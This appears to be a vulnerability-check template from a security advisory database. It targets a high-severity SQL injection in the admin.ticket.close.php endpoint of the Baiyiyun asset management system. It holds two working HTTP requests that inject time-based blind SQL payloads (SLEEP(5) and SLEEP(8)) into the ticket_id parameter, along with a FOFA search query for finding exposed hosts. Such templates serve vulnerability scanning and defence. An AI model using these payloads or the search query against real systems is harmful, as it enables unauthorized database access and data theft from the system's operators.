## id: VEID-2025-0112
## name: 百易云资产管理系统admin.ticket.close.php存在SQL注入漏洞
## author: hack007x
## severity: high
## tags: veid,sql,veid2025
## description: 百易云资产管理系统在admin.ticket.close.php接口下存在sql注入漏洞
## fofa-query: body="不要着急，点此"
## verification: true


GET /wuser/admin.ticket.close.php?ticket_id=1%20AND%20(SELECT%206941%20FROM%20(SELECT(SLEEP(5)))OKTO) HTTP/1.1
Host: {{Hostname}}
User-Agent: {{random_ua}}

#@ timeout: 20
#@ condition: and
#@ matcher: response_time >= 5
#@ matcher: status_code == 200

---

GET /wuser/admin.ticket.close.php?ticket_id=1%20AND%20(SELECT%206941%20FROM%20(SELECT(SLEEP(8)))OKTO) HTTP/1.1
Host: {{Hostname}}
User-Agent: {{random_ua}}

#@ timeout: 20
#@ condition: and
#@ matcher: response_time >= 8
#@ matcher: status_code == 200





# @VEIL-STAMP: 1235da5be5dbe2709e539767646e990de6d890b1ca2b6c62f0ad584210b95f9c
